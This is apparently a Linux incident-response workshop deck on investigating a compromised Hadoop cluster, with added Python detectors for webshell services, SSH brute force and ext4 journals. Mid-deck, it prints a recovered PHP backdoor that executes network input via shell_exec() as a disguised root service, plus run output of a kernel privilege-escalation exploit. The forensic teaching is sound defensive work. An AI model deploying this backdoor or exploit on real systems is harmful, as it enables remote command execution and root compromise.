Why it matters!!!...

Large numbers of Web & database servers run under Linux
(~ 70% of servers connected to the Internet run Linux).

Because of this, Linux became an attractive target for attackers.

If an attacker has succeeded in compromising MySQL, Apache or similar server software, then he has a “target-rich” environment.

Why it matters!!!...

Linux systems have become susceptible to several attacks, including botnets, cryptocurrency miners, ransomware and other types of malware.

The success of these attacks refutes the old notion that machines running Linux are less likely to be affected by malware.
Case: HDFS Cluster Breach

X Hadoop Distributed File System environment
X Main NameNode facing the Internet: Master
X DataNodes on a separate network: Slave 1 and Slave 2
X Suspicious activity was noticed on the network during the last 10 days
X Access to Master and Slaves from an unusual host
X New software is found on the system
Understanding how to navigate the system and where to look is one key to the success of your investigation...

Within the workshop, you will walk through the case covered, understand where to focus, and why. In other words, “learning while investigating...”
Protect Your Evidence...

X Searching might tamper with evidence...
o  find — stat()

X Disable FS atime:
Option #1:
x sudo mount -o remount,noatime /dev/....

Option #2:
x mkdir /mnt/extdrv/rootvol
x rootvol=/mnt/extdrv/rootvol
x sudo mount --bind / $rootvol
x sudo mount -o remount,bind,ro $rootvol
o  "bind" has to be repeated on the remount: without it, remount,ro is applied to the underlying superblock (the live root filesystem) instead of only the bind mountpoint.
File Hierarchy Standard

  root@kali:~# ls -l /
  bin -> usr/bin
  boot
  dev
  etc
  home
  lib -> usr/lib
  lib64 -> usr/lib64
  libx32 -> usr/libx32
  media
  mnt
  opt
  proc
  root
  run
  sbin -> usr/sbin
  srv
  sys
  usr
  var

  22 directories
  root@kali:~#

Everything in Linux is a file, and all files exist under the root directory, “/”.


File Hunting...

Searching for files that had their metadata changed within the last 5 days:
  find / -ctime +1 -ctime -5

Results (with the annotations from the slide):
  home dir?                   usr/php/.profile
                              usr/php/.bashrc
                              usr/php/.bash_logout
  Expected based on           /var/mail/.cache
  prev. analysis              /var/mail/.cache/motd.legal-displayed
                              /var/lib/mysql/ibdata1
                              /var/lib/php5
                              /var/lib/postgresql/9.3/main/pg_stat
                              /var/lib/ureadahead/boot.pack
                              /var/lib/ureadahead/pack
                              /var/lib/sudo
  Failed login attempts?      /var/log/faillog

Basic compromise checks

Hunt CLI History...

Checking the user's .bash_history file for commands executed (+ order of execution)...

  vim scripts/update.php        <- Web dir?
  ls -lh scripts/
  vim /var/log/lastlog
  history
  Why vim to PASSWD?
  What's 37292.c ?!!  -> check it later
Hunt Suspicious Dir...

The /usr/php directory details...
  sudo debugfs -R 'stat <1835263>' /dev....

  Inode: 1835263   Type: directory   Mode: 0755   Flags: 0x80000
  Generation: 1712021741   Version: 0x00000000:00000004
  User: 999   Group: 999   Size: 4096
  Directory ACL: 0
   ctime: 0x5d98793e:e31f0e48 -- Sat Oct  5 13:06:38 2019
   atime: 0x5d98793e:e31f0e48 -- Sat Oct  5 13:06:38 2019
   mtime: 0x5d98793e:e31f0e48 -- Sat Oct  5 13:06:38 2019
  crtime: 0x5d98793e:e31f0e48 -- Sat Oct  5 13:06:38 2019

Directory contents...
  ls -lhat /usr/php

  drwxr-xr-x php 4.0K Oct ...      .
             php  220 Apr  9 2014 .bash_logout
             php 3.6K Apr  9 2014 .bashrc
             php  675 Apr  9 2014 .profile
Hunt Last Logged Users... OR? Use debugfs...

Could be checked on a live system using:
  last
  lastlog
  sudo last -f /var/log/wtmp
  sudo last -f /var/log/btmp

(Output on the slide: several sessions from a host ending in .168.210.131 on Sat Oct ..., most lasting (00:00) to (00:04), one wtmp session lasting (2+10:45); the remaining columns are not legible.)

Checking the file system using TSK before mounting:
o  mmls
o  fsstat

  mmls output:
  DOS Partition Table
  Offset Sector: 0
  Units are in 512-byte sectors

       Start        End          Length       Description
       0000000000   0000000000   0000000001   Primary Table (#0)
       0000000000   0000002047   0000002048   Unallocated
       0000002048   0163577855   0163575808   Linux (0x83)
       0163577856   0163579903   0000002048   Unallocated
       0163579902   0167770111   0004190210   DOS Extended (0x05)
       0163579902   0163579902   0000000001   Extended Table (#1)
       0163579904   0167770111   0004190208   Linux Swap / Solaris x86 (0x82)
       0167770112   0167772159   0000002048   Unallocated
  tsurugi@forensiclab:~/Desktop/hdfs$

  (The Linux partition starts at sector 2048, which is the -o 2048 offset passed to istat/icat later.)

  fsstat output:
  FILE SYSTEM INFORMATION
  File System Type: Ext4
  Volume Name:
  Volume ID: c3dfec865832e886c489166d6cefca9
  Last Written at: 2019-10-06 23:23:02 (CEST)
  Last Checked at: 2017-11-07 22:06:43 (CET)
  Last Mounted at: 2019-10-06 23:23:03 (CEST)
  Source OS: Linux
  Dynamic Structure
  Compat Features: Journal, Ext Attributes, Resize Inode, Dir Index
  InCompat Features: Filetype, Needs Recovery, Extents, Flexible Block Groups,
  Read Only Compat Features: Sparse Super, Large File, Huge File, Extra Inode Size

-> use "norecovery" when mounting... ("Needs Recovery" means the journal has not been replayed; mounting read-only with norecovery leaves the journal untouched for later recovery work)
Hunt Files ???

X What are these php files doing here?!

Easy to spot if a baseline is available...

  rootvol/lib/systemd/system/php7.0-fpm.service
  rootvol/usr/bin/phar.phar7.0
  rootvol/usr/bin/php7.0
  rootvol/usr/lib/php/php7.0-fpm-checkconf
  rootvol/usr/lib/php/php-helper
  rootvol/usr/lib/php/php-maintscript-helper
  rootvol/usr/lib/php/20151012/iconv.so
  rootvol/usr/lib/php/20151012/posix.so
  rootvol/usr/lib/php/20151012/sysvshm.so
  rootvol/usr/lib/php/20151012/sysvmsg.so
  rootvol/usr/lib/php/20151012/json.so
  rootvol/usr/lib/php/20151012/ftp.so
  rootvol/usr/lib/php/20151012/shmop.so
  rootvol/usr/lib/php/20151012/ctype.so
  rootvol/usr/lib/php/20151012/opcache.so
  rootvol/usr/lib/php/20151012/tokenizer.so
  rootvol/usr/lib/php/20151012/fileinfo.so
  rootvol/usr/lib/php/20151012/sysvsem.so
  rootvol/usr/lib/php/20151012/calendar.so
  rootvol/usr/lib/php/20151012/exif.so
  rootvol/usr/lib/php/20151012/pdo.so
  rootvol/usr/lib/php/20151012/sockets.so
  rootvol/usr/lib/php/20151012/phar.so
  rootvol/usr/lib/php/20151012/readline.so
  rootvol/usr/lib/php/20151012/gettext.so
  rootvol/usr/lib/php/php7.0-fpm-reopenlogs
  rootvol/usr/lib/php/7.0/php.ini-production
  rootvol/usr/lib/php/7.0/sapi/cli
  rootvol/usr/lib/php/7.0/sapi/fpm
  rootvol/usr/lib/php/7.0/php.ini-development
  rootvol/usr/lib/php/7.0/php.ini-production.cli
  rootvol/usr/lib/php/sessionclean
  rootvol/usr/lib/tmpfiles.d/php7.0-fpm.conf

  ls -la rootvol/var/log/apt/ (excerpt):
                               nov.  7  2017 lock
                          4096 oct.  7 00:30 partial
  -rw-r--r--                2832 oct.  7 00:29
  -rw-r--r-- 1 root        10774 oct.  7 00:29
  -rw-r--r-- 1 root root    31K oct.  7 00:30 history.log
  -rw-r--r-- 1 root adm    232K oct.  7 00:30 term.log

  tsurugi@forensiclab:~/Desktop/hdfs$ tail -n15 rootvol/var/log/apt/history.log
  Commandline: apt-get remove oracle-java9-installer
  Requested-By: hadoop (1000)
  Remove: oracle-java9-set-default:amd64 (9.0.1-1~webupd8~0), oracle-java9-installer:amd64 (9.0.1-1~webupd8~0)
  End-Date: 2017-11-08 01:52:55

  Start-Date: 2017-11-08 06:12:58
  Commandline: /usr/bin/unattended-upgrade
  Install: linux-image-4.4.0-98-generic:amd64 (4.4.0-98.121, automatic), linux-image-extra-4.4.0-98-generic:amd64 (4.4.0-98.121, automatic), linux-headers-4.4.0-98-generic:amd64 (4.4.0-98.121, automatic), linux-headers-4.4.0-98:amd64 (4.4.0-98.121, automatic)
  Upgrade: linux-headers-generic:amd64 (4.4.0.31.33, 4.4.0.98.103), linux-image-generic:amd64 (4.4.0.31.33, 4.4.0.98.103), linux-generic:amd64 (4.4.0.31.33, 4.4.0.98.103)
  End-Date: 2017-11-08 06:13:42

  Start-Date: 2019-10-07 01:30:31
  Commandline: apt install php
  Install: php7.0-cli:amd64 (7.0.33-0ubuntu0.16.04.6, automatic), php-common:amd64 (1:35ubuntu6.1, automatic), php7.0-fpm:amd64 (7.0.33-0ubuntu0.16.04.6, automatic), php7.0-opcache:amd64 (7.0.33-0ubuntu0.16.04.6, automatic), php7.0:amd64 (7.0.33-0ubuntu0.16.04.6, automatic), php7.0-common:amd64 (7.0.33-0ubuntu0.16.04.6, automatic), php:amd64 (1:7.0+35ubuntu6.1), php7.0-json:amd64 (7.0.33-0ubuntu0.16.04.6, automatic), php7.0-readline:amd64 (7.0.33-0ubuntu0.16.04.6, automatic)
  End-Date: 2019-10-07 01:30:41

php config files will be found, but.... What about the cluster service? What's that? Check the inode.
Hunt Files /etc

ls -l output for the /etc files touched around the incident (all -rw-r--r-- except one -rwxr-xr-x; the size column is only partly legible, dates are day and time):

  7 00:30 rootvol/etc/php/7.0/cli/php.ini
  7 00:30 rootvol/etc/php/7.0/fpm/php-fpm.conf
  6 22:23 rootvol/etc/hosts
  7 00:30 rootvol/etc/php/7.0/fpm/pool.d/www.conf
  7 00:30 rootvol/etc/php/7.0/fpm/php.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/iconv.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/json.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/fileinfo.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/readline.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/pdo.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/exif.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/phar.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/ctype.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/gettext.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/sysvsem.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/ftp.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/sysvshm.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/shmop.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/tokenizer.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/opcache.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/calendar.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/sockets.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/posix.ini
  7 00:30 rootvol/etc/php/7.0/mods-available/sysvmsg.ini
          rootvol/etc/motd.txt
  6 22:41 rootvol/etc/network/interfaces
  6 18:10 rootvol/etc/vmware-tools/tools.conf
  6 18:10 rootvol/etc/vmware-tools/tools.conf.old
  7 00:30 rootvol/etc/init.d/php7.0-fpm
  7 00:30 rootvol/etc/init.d/.depend.start
  7 00:30 rootvol/etc/init.d/.depend.stop
  6 22:32 rootvol/etc/hostname
  7 00:30 rootvol/etc/apache2/conf-available/php7.0-fpm.conf
  7 00:30 rootvol/etc/cron.d/php
          rootvol/etc/systemd/system/cluster.service
  7 00:30 rootvol/etc/init/php7.0-fpm.conf
  7 00:30 rootvol/etc/logrotate.d/php7.0-fpm

  tsurugi@forensiclab:~/Desktop/hdfs$ sudo istat -o 2048 $hdfscase 2229804
  inode: 2229804
  Allocated
  Group: 272
  ...
  Accessed:       2019-10-07 00:31:29.645336261 (CEST)
  File Modified:  2019-10-07 00:28:16.492115650 (CEST)
  Inode Modified: 2019-10-07 00:28:16.492115650 (CEST)
  File Created:   2019-10-07 00:28:16.492115650 (CEST)
  Direct Blocks:
  10604153
What...??!!!

  tsurugi@forensiclab:~/Desktop/hdfs$ sudo icat -o 2048 $hdfscase 2229804
  [Unit]
  Description=Daemon Cluster Service
  After=network.target
  StartLimitIntervalSec=0

  [Service]
  Type=simple
  Restart=always
  RestartSec=1
  User=root
  ExecStart=/usr/bin/env php /usr/local/hadoop/bin/cluster.php

  [Install]
  WantedBy=multi-user.target
TSK icat cluster.php

PHP Webshell used as a systemd service!
X Error reporting = off
X Socket port = 17001
X PHP shell_exec()

  tsurugi@forensiclab:~/Desktop/hdfs$ sudo icat -o 2048 $hdfscase 2367366

  $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
  //socket_set_option($sock, SOL_SOCKET, SO_REUSEADDR, 1);
  if (socket_bind($sock, '0.0.0.0', 17001) == true) {
      for (;;) {
          socket_recvfrom($sock, $message, 1024000, 0, $ip, $port);
          $reply = shell_exec($message);
          socket_sendto($sock, $reply, strlen($reply), 0, $ip, $port);
      }
  } else {
      $error_code = socket_last_error();
      $error_msg = socket_strerror($error_code);
      //echo "code: ", $error_code, " msg: ", $error_msg;
  }
  exit;
  ?>
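The unit file and the script it starts are two halves of one finding, so here is an added example (not from the workshop slides) that triages both: it flattens a unit file, names the traits that made cluster.service stand out (interpreter launched through env, script outside package directories, root, unlimited restarts), and checks the PHP source for a socket whose received data reaches shell_exec(); UNIT_TEXT and SCRIPT_TEXT are constructed, abridged copies of the two recovered files, and the indicator names are this example's own.

```python
"""Triage a recovered systemd unit together with the script it launches.
Added example, not from the workshop slides: UNIT_TEXT and SCRIPT_TEXT are
constructed (abridged) copies of cluster.service and cluster.php shown above;
the indicator names and thresholds are this example's own choices.
"""
import re

UNIT_TEXT = """\
[Unit]
StartLimitIntervalSec=0
[Service]
Restart=always
User=root
ExecStart=/usr/bin/env php /usr/local/hadoop/bin/cluster.php
[Install]
WantedBy=multi-user.target
"""
SCRIPT_TEXT = """\
if (socket_bind($sock, '0.0.0.0', 17001) == true) {
    for (;;) {
        socket_recvfrom($sock, $message, 1024000, 0, $ip, $port);
        $reply = shell_exec($message);
        socket_sendto($sock, $reply, strlen($reply), 0, $ip, $port);
    }
}
"""
INTERPRETERS = {"php", "python", "python3", "perl", "ruby", "bash", "sh"}
PACKAGE_DIRS = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/bin/", "/sbin/")
EXEC_RE = r"(?:shell_exec|exec|system|passthru|popen|proc_open)"


def parse_unit(text: str) -> dict:
    """Flatten a unit file into {'Section.Key': value}; a repeated key keeps its last value."""
    section, out = "", {}
    for ln in (raw.strip() for raw in text.splitlines()):
        if not ln or ln[0] in "#;":
            continue
        if ln[0] == "[" and ln[-1] == "]":
            section = ln[1:-1]
        elif "=" in ln:
            key, _, value = ln.partition("=")
            out[f"{section}.{key.strip()}"] = value.strip()
    return out


def unit_indicators(text: str) -> list:
    """Names of the indicators that apply to the unit, in a fixed order."""
    u, hits = parse_unit(text), []
    argv = u.get("Service.ExecStart", "").split()
    if argv and argv[0].endswith("/env"):        # /usr/bin/env <interp> <script>
        hits.append("exec-via-env")
        argv = argv[1:]
    if argv and argv[0].rsplit("/", 1)[-1] in INTERPRETERS:
        hits.append("interpreter-runs-script")
        if len(argv) > 1 and not argv[1].startswith(PACKAGE_DIRS):
            hits.append("script-outside-package-dirs")
    if u.get("Service.User", "root") == "root":   # systemd's default user is root
        hits.append("runs-as-root")
    if u.get("Service.Restart") == "always" and u.get("Unit.StartLimitIntervalSec") == "0":
        hits.append("unlimited-restart")
    return hits


def script_indicators(text: str) -> list:
    """PHP indicators: a listening socket, and socket_recv* output reaching an exec primitive."""
    hits = []
    if re.search(r"\bsocket_(?:bind|listen|create_listen)\s*\(", text):
        hits.append("socket-listener")
    m = re.search(r"\bsocket_recv(?:from)?\s*\(\s*\$\w+\s*,\s*\$(\w+)", text)
    if m and re.search(rf"\b{EXEC_RE}\s*\(\s*\${m.group(1)}\b", text):
        hits.append("network-input-to-exec")
    return hits


def triage(unit_text: str, script_text: str) -> dict:
    """'webshell_service': root interpreter service whose script executes what the network sends."""
    u, s = unit_indicators(unit_text), script_indicators(script_text)
    verdict = {"interpreter-runs-script", "runs-as-root"} <= set(u) and "network-input-to-exec" in s
    return {"unit": u, "script": s, "webshell_service": verdict}
```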
But the question is: how did they get here?
Hunt Logins
Failed Logins (btmp)

last -f output on the slide (the user column is not legible):
  pts/1        192.168.2.129      Mon Oct  7 00:23 - 00:48  (00:24)
  pts/0        192.168.2.1        Sun Oct ...
  tty1                            Sun Oct ...
  system boot  4.4.0-98-generic   Sun Oct ...
  pts/0        192.168.2.100      Sun Oct ...
  (session end states seen: gone - no logout, 23:27 (00:04), still running, down (00:00), 23:20 (00:28), 22:50 (00:00), crash (00:11), 23:20 (04:40), crash (-3:-59))

auth.log on master (Oct; times not legible):
  master sshd[2403]: pam_unix(sshd:auth): check pass; user unknown
  master sshd[2403]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.2.129
  master sshd[2344]: Failed password for root from 192.168.2.129 port 56372 ssh2
  master sshd[2344]: Connection closed by 192.168.2.129 port 56372 [preauth]
  master sshd[2387]: Failed password for invalid user amavisd from 192.168.2.129 port 56376 ssh2
  master sshd[2388]: Failed password for invalid user amavisd from 192.168.2.129 port 56378 ssh2
  master sshd[2387]: Connection closed by 192.168.2.129 port 56376 [preauth]
  master sshd[2388]: Connection closed by 192.168.2.129 port 56378 [preauth]
  master sshd[2385]: Failed password for root from 192.168.2.129 port 56374 ssh2
  master sshd[2385]: Connection closed by 192.168.2.129 port 56374 [preauth]
  master sshd[2391]: Failed password for invalid user security from 192.168.2.129 port 56382 ssh2
  master sshd[2391]: Connection closed by 192.168.2.129 port 56382 [preauth]
  master sshd[2393]: Failed password for invalid user oleg from 192.168.2.129 port 56386 ssh2
  master sshd[2393]: Connection closed by 192.168.2.129 port 56386 [preauth]
  master sshd[2395]: Failed password for invalid user oleg from 192.168.2.129 port 56388 ssh2
  master sshd[2395]: Connection closed by 192.168.2.129 port 56388 [preauth]
  master sshd[2318]: Failed password for root from 192.168.2.129 port 56356 ssh2
  master sshd[2318]: Connection closed by 192.168.2.129 port 56356 [preauth]
  master sshd[2318]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.2.129  user=root
  master sshd[2397]: Failed password for invalid user dialer from 192.168.2.129 port 56392 ssh2
  master sshd[2397]: Connection closed by 192.168.2.129 port 56392 [preauth]
  master sshd[2398]: Failed password for invalid user ghost from 192.168.2.129 port 56396 ssh2
  master sshd[2398]: Connection closed by 192.168.2.129 port 56396 [preauth]
  master sshd[2401]: Failed password for root from 192.168.2.129 port 56402 ssh2
  master sshd[2401]: Connection closed by 192.168.2.129 port 56402 [preauth]
  master sshd[2403]: Failed password for invalid user magnos from 192.168.2.129 port 56404 ssh2
  master sshd[2403]: Connection closed by 192.168.2.129 port 56404 [preauth]
  master sshd: Accepted password for hadoop from 192.168.2.129 port 56406 ssh2     <-- highlighted on the slide
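The sequence above, a run of guesses against several account names from one host followed by an accepted password for hadoop from that same host, is a pattern worth coding once; here is an added example (not from the workshop slides) that parses sshd auth.log lines, identifies guessing sources, and reports successes that follow their failures. SAMPLE_LOG is constructed from the messages on the slide; its timestamps and the pid on the accepted line are made up, and the thresholds are this example's own.

```python
"""Spot a password-guessing run in sshd auth.log lines and flag a later
success from the same source, the pattern that gave the actor 'hadoop' here.

Added example, not from the workshop slides. SAMPLE_LOG is constructed from
the messages shown above (invalid-user and root guesses from 192.168.2.129,
then an accepted password for hadoop); timestamps and the pid on the accepted
line are made up, and the thresholds are this example's own choices.
"""
import re
from collections import defaultdict

SAMPLE_LOG = """\
Oct  7 00:21:10 master sshd[2344]: Failed password for root from 192.168.2.129 port 56372 ssh2
Oct  7 00:21:11 master sshd[2387]: Failed password for invalid user amavisd from 192.168.2.129 port 56376 ssh2
Oct  7 00:21:12 master sshd[2391]: Failed password for invalid user security from 192.168.2.129 port 56382 ssh2
Oct  7 00:21:13 master sshd[2393]: Failed password for invalid user oleg from 192.168.2.129 port 56386 ssh2
Oct  7 00:21:14 master sshd[2397]: Failed password for invalid user dialer from 192.168.2.129 port 56392 ssh2
Oct  7 00:21:15 master sshd[2398]: Failed password for invalid user ghost from 192.168.2.129 port 56396 ssh2
Oct  7 00:21:16 master sshd[2401]: Failed password for root from 192.168.2.129 port 56402 ssh2
Oct  7 00:21:17 master sshd[2403]: Failed password for invalid user magnos from 192.168.2.129 port 56404 ssh2
Oct  7 00:21:17 master sshd[2403]: Connection closed by 192.168.2.129 port 56404 [preauth]
Oct  7 00:21:18 master sshd[2405]: Accepted password for hadoop from 192.168.2.129 port 56406 ssh2
Oct  6 22:50:03 master sshd[1801]: Accepted password for hadoop from 192.168.2.100 port 50112 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?P<invalid>invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port (?P<port>\d+)"
)


def parse_sshd_auth(text: str) -> list:
    """Keep only Accepted/Failed authentication lines (in log order) as dicts."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["invalid"] = ev["invalid"] is not None   # account does not exist
            events.append(ev)
    return events


def brute_force_sources(events: list, min_failures: int = 5, min_users: int = 3) -> list:
    """Sources with at least min_failures failures spread over min_users names;
    requiring several names separates guessing from one user's typos."""
    fails, users = defaultdict(int), defaultdict(set)
    for ev in events:
        if ev["result"] == "Failed":
            fails[ev["src"]] += 1
            users[ev["src"]].add(ev["user"])
    return sorted(s for s in fails
                  if fails[s] >= min_failures and len(users[s]) >= min_users)


def guessed_users(events: list, src: str) -> list:
    """Sorted account names tried and refused from src."""
    return sorted({ev["user"] for ev in events if ev["src"] == src and ev["result"] == "Failed"})


def successes_after_bruteforce(events: list, **thresholds) -> list:
    """(ts, user, src, port) of Accepted logins from a guessing source that come
    after that source's failures; a success from another host is not flagged."""
    suspects = set(brute_force_sources(events, **thresholds))
    seen_failure, hits = set(), []
    for ev in events:
        if ev["src"] not in suspects:
            continue
        if ev["result"] == "Failed":
            seen_failure.add(ev["src"])
        elif ev["src"] in seen_failure:
            hits.append((ev["ts"], ev["user"], ev["src"], ev["port"]))
    return hits


if __name__ == "__main__":
    evs = parse_sshd_auth(SAMPLE_LOG)
    for src in brute_force_sources(evs):
        print(src, "tried:", ", ".join(guessed_users(evs, src)))
    print(successes_after_bruteforce(evs))
```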


More File Hunting...

X Search for files added post the login activity (our reference):
  sudo find rootvol/ -type f -newercm rootvol/var/log/lastlog
  (-newercm: the file's ctime is newer than the reference file's mtime)

  tsurugi tsurugi 8,5K oct. 7 00:29 rootvol/home/hadoop/.viminfo
  tsurugi tsurugi  35K oct. 7 00:34 rootvol/home/hadoop/temp/master
  tsurugi tsurugi 7,4K oct. 7 00:48 rootvol/home/hadoop/.bash_history
  -rwxr-xr-x 1 ...                  rootvol/home/hadoop/45010      <- Binary used for exploitation

  tsurugi@forensiclab:~/Desktop/hdfs$ file rootvol/home/hadoop/45010
  rootvol/home/hadoop/45010: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l..., BuildID[sha1]=38f8ab3652358f154d8da3a131bfb8b1832ec23d, for GNU/Linux 3.2.0, not stripped

Lateral Movement

o Checking the .bash_history file on master against auth.log on Slave2 leads to:

  Oct 6 slave2 sshd[1074]: Server listening on 0.0.0.0 port 22.
  Oct 6 slave2 sshd[1074]: Server listening on :: port 22.
  Oct 7 slave2 CRON[1170]: pam_unix(cron:session): session opened for user root by (uid=0)
  Oct 7 slave2 CRON[1170]: (not legible)
  Oct 7 slave2 sshd[11..]: (not legible; connection from 192.168....)
  Oct 7 slave2 sshd[1173]: (not legible)
  Oct 7 slave2 systemd: pam_unix(systemd-user:session): session opened for user hadoop by (uid=0)
  Oct 7 slave2 systemd-logind[930]: New session 2 of user hadoop.

Threat actor used ssh-keys to log in to Slave2 & Slave 1 (moving laterally to other systems).

There is more to this, but that's it for now :)
Deleted Files
-we need them back-

o Googling — probably an exploit!!!
  Credit @bleidl, this is a slight modification to his original POC
  https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c

X Searching the directory the file was found in leads to nothing!
  https://ricklarabee.blogspot.com/ ebpf-and-analysis-of-get-rekt-linux.html

o After Googling around, we found it's actually an exploit!

  Banner and run output as shown on the slide:
  Tested on Fedora 27 4.13.9-300 ... Linux Kernel < 4.13.9 ... 4.13.0-21-generic ... exploit
  ... -o cve-2017-16995
  cve-2017-16995$ ./cve-2017-16995
  ... exploit for counterfeit grsec kernels such as KSPP and linux-hardened t...
  ** This vulnerability cannot be exploited at all on authentic grsecurity kern...
  creating bpf map
  sneaking evil bpf past the verifier
  creating socketpair()
  attaching bpf backdoor to socket
  skbuff => ...880038c3f500
  Leaking sock ...
  sk_rcvtimeo at offset ...
  ... structure at ffff88...
  UID from cred structure: 1000, matches the current: 1000
  hammering cred structure at ffff880038704600
  credentials patched, launching shell..

  uid=0(root) gid=0(root) groups=0(root),4(adm),(cdrom),27(sudo),30(dip)
EXT4 = journaling fs...
Dump the Journal!!..

X If we check using TSK, since it's an EXT4 fs, then even if we know what name it had, we still can't access the content, since its entry will be zeroed out!
o No longer capable of accessing the file...

X Also, if we check those * files, we will also get zero output!
o No metadata that leads to the file...

X We could try dumping them out in two steps:
o Dump the EXT4 journal
o Use ext4magic for recovery

Get them Back!!!..

X Step 1: debugfs
  sudo debugfs -R 'dump <8> ./journal' /dev/.....
o dump — option used to dump a file using its inode #
o 8 — inode # of the EXT4 journal

X Step 2: ext4magic
  sudo ext4magic /dev/..... -a DATE -b DATE -j ./journal -m -d output/
o -a and -b are used to specify the date after and before (Unix timestamps)...
o -j for the journal...
o -m try to recover all deleted files...
o the device argument is the same ext4 volume the journal was dumped from

Sift through output
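Before handing ./journal to ext4magic it helps to know what the dump contains, so here is an added example (not from the workshop slides) that reads the jbd2 superblock of a dumped journal, reports whether the log still holds un-replayed transactions (the "Needs Recovery" flag fsstat showed earlier) and lists the committed transaction sequence range, which bounds what recovery can find; the journal image is constructed inline so the code runs offline.

```python
"""Inspect a dumped ext4 journal (the ./journal file that debugfs 'dump <8>'
writes) before running ext4magic: read the jbd2 superblock, tell whether the
log still holds un-replayed transactions (the 'Needs Recovery' flag fsstat
showed), and list the transaction sequence range present in the dump.

Added example, not from the workshop slides. The journal image is constructed
inline (one jbd2 v2 superblock plus two descriptor/data/commit triplets) so the
code runs offline; the on-disk layout follows jbd2 (all fields big-endian).
"""
import struct

JBD2_MAGIC = 0xC03B3998
BLOCKTYPE = {1: "descriptor", 2: "commit", 3: "superblock-v1", 4: "superblock-v2", 5: "revoke"}
HEADER = struct.Struct(">III")       # h_magic, h_blocktype, h_sequence
SB_BODY = struct.Struct(">IIIIII")   # s_blocksize, s_maxlen, s_first, s_sequence, s_start, s_errno


def parse_journal_superblock(img: bytes) -> dict:
    """Fields of the journal superblock at block 0."""
    magic, btype, _ = HEADER.unpack_from(img, 0)
    if magic != JBD2_MAGIC or btype not in (3, 4):
        raise ValueError("not a jbd2 journal superblock")
    bs, maxlen, first, seq, start, errno = SB_BODY.unpack_from(img, HEADER.size)
    # s_start is the first block of the oldest transaction still in the log;
    # zero means the journal was cleanly unmounted or already replayed.
    return {"version": BLOCKTYPE[btype], "blocksize": bs, "maxlen": maxlen, "first": first,
            "sequence": seq, "start": start, "errno": errno, "needs_recovery": start != 0}


def scan_journal(img: bytes) -> list:
    """(block_no, type, sequence) for every log block carrying a jbd2 header.
    Data blocks that happen to start with the magic are escaped by jbd2 (first
    word zeroed, JBD2_FLAG_ESCAPE set in the descriptor), so the scan is safe."""
    sb = parse_journal_superblock(img)
    bs, found = sb["blocksize"], []
    for blk in range(sb["first"], len(img) // bs):
        magic, btype, seq = HEADER.unpack_from(img, blk * bs)
        if magic == JBD2_MAGIC and btype in BLOCKTYPE:
            found.append((blk, BLOCKTYPE[btype], seq))
    return found


def transaction_range(img: bytes):
    """(lowest, highest) sequence among committed transactions, or None if none."""
    seqs = [seq for _, kind, seq in scan_journal(img) if kind == "commit"]
    return (min(seqs), max(seqs)) if seqs else None


def build_sample_journal(blocksize: int = 1024, first_seq: int = 41, clean: bool = False) -> bytes:
    """Constructed image: v2 superblock at block 0, then two transactions, each
    a descriptor, one data block and a commit, occupying blocks 1-6."""
    img = bytearray(blocksize * 7)
    HEADER.pack_into(img, 0, JBD2_MAGIC, 4, 0)
    SB_BODY.pack_into(img, HEADER.size, blocksize, 7, 1, first_seq, 0 if clean else 1, 0)
    for i, seq in enumerate((first_seq, first_seq + 1)):
        base = 1 + 3 * i
        HEADER.pack_into(img, base * blocksize, JBD2_MAGIC, 1, seq)              # descriptor
        img[(base + 1) * blocksize:(base + 2) * blocksize] = b"\xaa" * blocksize  # data
        HEADER.pack_into(img, (base + 2) * blocksize, JBD2_MAGIC, 2, seq)        # commit
    return bytes(img)


if __name__ == "__main__":
    journal = build_sample_journal()
    print(parse_journal_superblock(journal))
    print(scan_journal(journal))
    print("transactions:", transaction_range(journal))
```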
Timeline Analysis?...

We can confirm the activities and their sequence by doing a timeline analysis.

Timeline rows from the slide (l2tcsv format; host VulnOSv2, source /var/log/auth.log, sha256_hash b8e6a67fdb202938cc2fb1cb666f9fe66436a9225399946f30231e384c06fdb4; only the message column is legible):
  10/05/2019 13:00:01  [CRON pid: ...] pam_unix(cron:session): session opened for user www-data by (uid=0)
  10/05/2019 13:06:38  [useradd pid: 2525] add 'php' to group 'sudo'
  10/05/2019 13:06:38  [useradd pid: 2525] add 'php' to shadow group 'sudo'
  10/05/2019 13:06:38  [useradd pid: 2525] new group: name=php GID=999
  10/05/2019 13:06:38  [useradd pid: 2525] new user: name=php UID=999 GID=999 home=/usr/php shell=/bin/bash
  10/05/2019 13:06:38  [sudo] pam_unix(sudo:session): session closed for user root

Timeline viewer (filter: useradd):
  2019-10-05 11:06:..  OS Last Access  1308613  OS:/usr/sbin/useradd  Type: file
  2019-10-05 11:06:..  OS Last Access  1831585  OS:/etc/default/useradd  Type: file
  2019-10-05 13:06:..  Log File        525608   [useradd pid: 2525] add 'php' to group 'sudo'
